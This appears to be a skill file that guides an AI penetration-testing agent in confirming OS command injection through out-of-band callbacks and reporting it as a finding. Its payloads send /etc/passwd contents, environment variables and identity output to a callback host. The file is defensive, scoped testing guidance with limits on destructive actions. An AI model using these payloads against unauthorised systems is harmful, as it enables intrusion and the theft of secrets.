name: command-injection-rce
description: Turn suspected OS command injection (a parameter that lands in a shell or a child process) into proof of remote code execution via an OAST callback, plus one safe demonstration of follow-on impact (read a file, list users, env dump). Use when a parameter feeds an exec/spawn/system call, when payloads with $(), `, ;, |, && cause response differences, or when audit flags CWE-78 / CWE-77. Never sends destructive commands.
license: MIT
allowed-tools:
- query_records
- inspect_record
- replay_request
- oast_mint
- oast_poll
- attack_kit
- report_finding
- update_finding
- remember
- update_plan
Command Injection → RCE Proof
You have a parameter that smells like it lands in a shell or process
exec call. Your job is to prove arbitrary command execution by getting
an OAST callback from the server, then demonstrate one minimal
follow-on action (a file read, an env dump). Reporting "the response
changed when I sent ;" is not enough.
When this skill applies
- A parameter feeds something likely to exec: cmd=, host= (ping), target= (traceroute), file= (image conversion, PDF render, zip/tar), filter=, format= (ffmpeg, imagemagick), name= on a user-management endpoint that shells out.
- Response differs when you send characters that have shell meaning: ;, |, &, &&, ||, `, $(...), \n.
- A 500 error message reveals a binary name (sh, bash, convert, ffmpeg, ImageMagick, node, python, php) in the stack trace or response body.
- Audit finding: CWE-78 (OS command injection), CWE-77 (command injection), CWE-94 (code injection).
Workflow
1. Confirm a shell metacharacter changes behavior
Pick a candidate parameter from query_records + inspect_record.
Send three replay_request probes:
- Baseline: harmless value (e.g. 8.8.8.8 for a ping endpoint).
- 8.8.8.8; → trailing separator. Status / length differential?
- 8.8.8.8 && echo hi → does hi appear in the response, or does the response take longer?
If none of these change the response, the parameter is probably sanitized or doesn't shell out. Stop and pick another candidate.
remember the candidate parameter and which metacharacter triggered
the differential (key: cmdinj-target).
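The three-probe comparison can be sketched as a small helper. This is a minimal illustration, not part of any tool: ProbeResult, its fields, and the tolerance values are hypothetical, and you would fill them from whatever replay_request returns.

```python
from dataclasses import dataclass


@dataclass
class ProbeResult:
    """Hypothetical summary of one replayed request (not a real tool schema)."""
    status: int
    length: int
    elapsed_s: float
    body: str


def differential(baseline: ProbeResult, probe: ProbeResult, marker: str = "",
                 length_tolerance: int = 16,
                 delay_threshold_s: float = 2.0) -> list[str]:
    """Return the ways a probe response differs from the baseline."""
    signals = []
    if probe.status != baseline.status:
        signals.append("status")
    if abs(probe.length - baseline.length) > length_tolerance:
        signals.append("length")
    if probe.elapsed_s - baseline.elapsed_s > delay_threshold_s:
        signals.append("delay")
    # Count the marker only when the baseline response does not already contain it.
    if marker and marker in probe.body and marker not in baseline.body:
        signals.append("marker")
    return signals
```

An empty list for every probe means no differential, so move to another candidate. A "marker" signal can also come from an endpoint that simply reflects its input, so treat it as a lead for step 2, not as proof.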
2. Confirm execution via OAST
Mint a canary with oast_mint (kind: cmdinj-probe). Inject a payload
that performs a DNS or HTTP request to the canary. Choose the encoding
by the suspected OS / language:
- Generic shell: value; curl <canary> or value && nslookup <canary>
- Backticks: value`curl <canary>` (works in sh/bash).
- $() substitution: value$(curl <canary>).
- Windows cmd.exe: value & nslookup <canary> (note the single &).
- PowerShell: value; Invoke-WebRequest <canary>.
Use attack_kit with class: "cmd-injection" to pull canonical
payload patterns for the parameter's encoding (URL vs JSON vs header).
Poll oast_poll for 60 seconds. The first DNS or HTTP callback proves
execution. DNS-only is still proof, and it is often all you will see:
most internal hosts can resolve external names even when HTTP egress
is blocked.
remember the callback proof (timestamp, payload, callback URL) with
key cmdinj-proof.
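The 60-second polling window can be sketched as a loop with a deadline. This is an illustration under assumptions: poll is a hypothetical callable standing in for oast_poll, each interaction is assumed to be a dict, and "protocol" is an assumed field name; the real tool output may look different.

```python
import time
from typing import Callable, Iterable, Optional


def wait_for_callback(poll: Callable[[], Iterable[dict]],
                      timeout_s: float = 60.0,
                      interval_s: float = 5.0,
                      clock: Callable[[], float] = time.monotonic,
                      sleep: Callable[[float], None] = time.sleep) -> Optional[dict]:
    """Poll until the first DNS or HTTP interaction arrives or the window closes."""
    deadline = clock() + timeout_s
    while True:
        for event in poll():
            # "protocol" is an assumed field name for the interaction type.
            if str(event.get("protocol", "")).lower() in {"dns", "http"}:
                return event
        if clock() >= deadline:
            return None
        sleep(interval_s)
```

The clock and sleep parameters exist only so the loop can be exercised without waiting a real minute. A None result means no callback arrived in the window, which is not enough to claim RCE.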
3. One follow-on demonstration
Once RCE is proven, send ONE additional payload to size impact. Pick the cheapest demo that establishes "the attacker has hands on the box":
- File read: ; curl <canary>?d=$(cat /etc/passwd | base64) (base64 so the data survives the query string; expect truncation).
- Env dump: ; env | curl --data-binary @- <canary>
- Hostname / user: ; (whoami; hostname; id) | curl --data-binary @- <canary>
Wait for the callback. Decode the leaked data (base64 if you used it).
Include ONE line of the leaked data in the finding — not the whole
/etc/passwd.
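Decoding and masking can be sketched as follows. This is a minimal example, assuming the leaked value arrives as a base64 string that may be cut off mid-stream; the function names and the 11-character prefix are illustrative choices, not part of any tool.

```python
import base64
import binascii


def decode_leak(b64_text: str) -> str:
    """Decode possibly truncated base64 into text, tolerating a cut-off tail."""
    # Assumption: a space in a logged query string was originally '+'.
    cleaned = b64_text.replace(" ", "+")
    cleaned = "".join(cleaned.split()).rstrip("=")
    if len(cleaned) % 4 == 1:
        cleaned = cleaned[:-1]  # a lone trailing character cannot encode a byte
    cleaned += "=" * (-len(cleaned) % 4)  # restore padding for the decoder
    try:
        raw = base64.b64decode(cleaned)
    except binascii.Error:
        return ""
    return raw.decode("utf-8", errors="replace")


def mask_line(line: str, keep: int = 11) -> str:
    """Keep a short prefix of one leaked line and elide the rest."""
    return line if len(line) <= keep else line[:keep] + "..."


def first_masked_line(b64_text: str) -> str:
    """Return the first decoded line, masked, or an empty string."""
    lines = decode_leak(b64_text).splitlines()
    return mask_line(lines[0]) if lines else ""
```

Only the masked first line goes into the finding; the full decoded text should not be stored or reported.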
Do not run destructive commands: no rm, no > /etc/..., no
package installs, no port scans, no reverse shells, no persistence
mechanisms. The callback + one small data fetch is sufficient proof.
4. Persist the finding
report_finding:
- severity: critical. OS command execution on the server is always critical regardless of what you leaked.
- title: name the endpoint, parameter, and the proof: "OS command injection in /api/render filter parameter; OAST callback + reads /etc/passwd".
- cwe_id: CWE-78.
- description: 3-4 sentences. The endpoint, the trigger metacharacter, the OAST callback timestamp, and one masked line of the follow-on demo (e.g., "first /etc/passwd line: root:x:0:0:...").
- Include the exact payload that triggered the callback.
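The fields above can be assembled along these lines. This is a sketch only: the Finding dataclass and build_finding are hypothetical, the real report_finding schema may name or structure its arguments differently, and the timestamp in the usage example is a placeholder.

```python
from dataclasses import dataclass, asdict


@dataclass
class Finding:
    """Hypothetical shape; the real report_finding schema may differ."""
    severity: str
    title: str
    cwe_id: str
    description: str
    payload: str


def build_finding(endpoint: str, parameter: str, metachar: str, payload: str,
                  callback_ts: str, masked_line: str,
                  demo: str = "reads /etc/passwd") -> dict:
    """Assemble the finding fields from the proof collected in steps 1-3."""
    title = (f"OS command injection in {endpoint} {parameter} parameter; "
             f"OAST callback + {demo}")
    description = (
        f"The {parameter} parameter of {endpoint} reaches a shell. "
        f"The metacharacter {metachar!r} triggered the differential. "
        f"An OAST callback arrived at {callback_ts}. "
        f"First leaked line (masked): {masked_line}"
    )
    return asdict(Finding("critical", title, "CWE-78", description, payload))
```

For example, build_finding("/api/render", "filter", ";", "x; curl <canary>", "2024-01-01T00:00:00Z", "root:x:0:0:...") yields a dict whose title matches the pattern shown in the list above.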
Pitfalls
- A response delay when you send ; sleep 5 is suggestive but not proof: network jitter and shared rate limiters cause similar delays. Require an OAST callback before claiming RCE.
- Some sandboxes (gVisor, nsjail) restrict egress; DNS-only callbacks may be all you get. Note that explicitly in the finding.
- Image processors (convert, ffmpeg) sometimes have shell injection via filenames or annotation fields. These surfaces are less obvious than cmd=; check filenames.
- Argument injection (without a shell) is a related but distinct flaw, e.g. --config=/etc/passwd against a tool that reads --config files. Still report as CWE-77 / CWE-78 if it leaks data; CWE-88 is the more specific ID when no shell is involved.
- If the callback carries base64-encoded data, decode and read it before reporting. Sometimes the payload encoding garbled the data in transit and what you have is just truncated noise, not proof.
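The "decode and read it" check from the last pitfall can be partly automated when the demo was a /etc/passwd read. This is a conservative sketch, assuming the standard seven-field passwd layout; looks_like_passwd is a hypothetical helper, and it ignores a final line that may have been cut off.

```python
import re

# Seven colon-separated fields: name, password, UID, GID, GECOS, home, shell.
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")


def looks_like_passwd(decoded: str, min_lines: int = 1) -> bool:
    """True if at least min_lines complete lines match the passwd layout."""
    # Drop the last piece: it is either empty or a possibly truncated line.
    complete = decoded.split("\n")[:-1]
    matches = sum(1 for line in complete if PASSWD_LINE.match(line))
    return matches >= min_lines
```

A False result does not mean the injection failed; it means the leaked data is not usable as evidence, so rely on the callback itself or repeat the single follow-on demo with a smaller output such as whoami.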
Output expectations
- One report_finding (critical) with payload + callback timestamp + one masked line of leaked data.
- A remember note (key: cmdinj-proof) with the canonical payload.
- Plan item marked done.